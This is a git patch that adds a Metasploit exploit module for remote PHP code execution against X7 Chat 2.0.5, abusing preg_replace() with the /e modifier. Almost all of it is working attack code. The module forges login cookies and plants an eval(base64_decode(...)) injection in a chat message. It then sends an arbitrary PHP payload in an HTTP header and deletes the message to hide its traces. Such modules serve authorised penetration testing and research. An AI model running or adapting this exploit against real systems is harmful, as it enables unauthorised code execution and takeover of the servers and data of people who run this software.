From d66dc889248aa72a1f206e27313cf04e50eff03c Mon Sep 17 00:00:00 2001
From: root <root@localhost.localdomain>
Date: Mon, 27 Oct 2014 01:01:31 -0500
Subject: [PATCH] Add PHP Code Execution for X7 Chat 2.0.5

---
 .../exploits/multi/http/x7chat2_php_exec.rb   | 145 ++++++++++++++++++
 1 file changed, 145 insertions(+)
 create mode 100644 modules/exploits/multi/http/x7chat2_php_exec.rb

diff --git a/modules/exploits/multi/http/x7chat2_php_exec.rb b/modules/exploits/multi/http/x7chat2_php_exec.rb
new file mode 100644
index 0000000000..ec72a932a5
--- /dev/null
+++ b/modules/exploits/multi/http/x7chat2_php_exec.rb
@@ -0,0 +1,145 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GoodRanking
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::PhpEXE
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'The X7 Group X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution',
+			'Description'    => %q{
+				Library lib/message.php for X7 Chat 2.0.5 uses preg_replace() function with the /e modifier.
+        		This allow execute PHP code in the remote machine.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Fernando Munoz # fmunozs', # discovery
+					'Juan Escobar # itseco', # module development
+				],
+			#'References' 	 => [],
+			'Platform'       => ['php'],
+      		'Arch'           => ARCH_PHP,
+			'Targets'        => [
+				['Generic (PHP Payload)', {'Arch' => ARCH_PHP, 'Platform' => 'php'}]
+			],
+			'DisclosureDate' => 'Oct 27 2014',
+			'DefaultTarget'  => 0))
+
+			register_options(
+			[
+				OptString.new('USERNAME', [ true, 'Username to authenticate as', 'user']),
+				OptString.new('PASSWORD', [ true, 'Pasword to authenticate as', 'user']),
+				OptString.new('TARGETURI', [ true, 'Base x7 Chat directory path', '/x7chat2']),
+			], self.class)
+	end
+
+	def check
+	    res = exec_php("phpinfo(); die();", true)
+
+	    if (res.body =~ /This program makes use of the Zend/)
+	    	return Exploit::CheckCode::Vulnerable
+	    else
+	      return Exploit::CheckCode::Unknown
+	    end
+	end
+
+	def exec_php(php_code, check = false)
+
+		cookie_x7c2u = "X7C2U=" + datastore['USERNAME']
+		cookie_x7c2p = "X7C2P=" + Rex::Text.md5(datastore['USERNAME']) 
+		rand_text = Rex::Text.rand_text_alpha(5, 8)
+
+		# remove comments, line breaks and spaces
+		praw = php_code.gsub(/(\s+)|(#.*)/, '')
+		
+		# clean b64 (we can not use quotes or apostrophes and b64 string must not contain equals)
+		while Rex::Text.encode_base64(praw) =~ /==/ || Rex::Text.encode_base64(praw) =~ /=/
+			praw = praw + " "
+		end
+
+		pb64 = Rex::Text.encode_base64(praw)
+
+		print_status("Sending offline message (#{rand_text}) to #{datastore['USERNAME']}...")
+		res = send_request_cgi({
+			'method'   => 'GET',
+			'uri' 	   => normalize_uri(target_uri.path, 'index.php'),
+			'headers'  => {
+				'Cookie' => "#{cookie_x7c2u}; #{cookie_x7c2p};",
+			},
+			'vars_get' => {
+				'act' 	  => 'userpanel',	
+				'cp_page' => 'msgcenter',	
+				'to' 	  => datastore['USERNAME'],	
+				'subject' => rand_text,
+				'body' 	  => "#{rand_text}www.${eval(base64_decode(getallheaders()[p]))}.c#{rand_text}",
+			}
+		})
+
+		if res && res.code == 200
+			print_good("Message (#{rand_text}) sent successfully")
+		else
+			fail_with(Failure::NoAccess, 'Sending the message (#{rand_text}) has failed')
+		end
+
+		if res.body =~ /([0-9]*)">#{rand_text}/
+			message_id = $1
+		else
+			fail_with(Failure::NoAccess, 'Could not find message (#{rand_text}) in the message list')
+		end
+
+		print_status("Accessing message (#{rand_text})")
+		print_status("Sending payload in HTTP header 'p'")
+		res = send_request_cgi({
+			'method'   => 'GET',
+			'uri' 	   => normalize_uri(target_uri.path, 'index.php'),
+			'headers'  => {
+				'Cookie' => "#{cookie_x7c2u}; #{cookie_x7c2p};",
+				'p'     => "#{pb64}",
+			},
+			'vars_get' => {
+				'act' 	  => 'userpanel',	
+				'cp_page' => 'msgcenter',	
+				'read'	  =>  message_id,
+			}	
+		})
+
+		res_payload = res
+
+		print_status("Deleting message (#{rand_text})")
+		res = send_request_cgi({
+			'method'   => 'GET',
+			'uri' 	   => normalize_uri(target_uri.path, 'index.php'),
+			'headers'  => {
+				'Cookie' => "#{cookie_x7c2u}; #{cookie_x7c2p};",
+			},
+			'vars_get' => {
+				'act' 	  => 'userpanel',	
+				'cp_page' => 'msgcenter',	
+				'delete'  =>  message_id,
+			}	
+		})		
+
+		if res.body =~ /The message has been deleted/
+			print_good("Message (#{rand_text}) removed")
+		else
+			print_error('Removing message (#{rand_text}) has failed')
+		end
+
+		# if check return the response
+		if check
+			return res_payload
+		end
+	end
+
+	def exploit
+		exec_php(payload.raw)
+	end
+end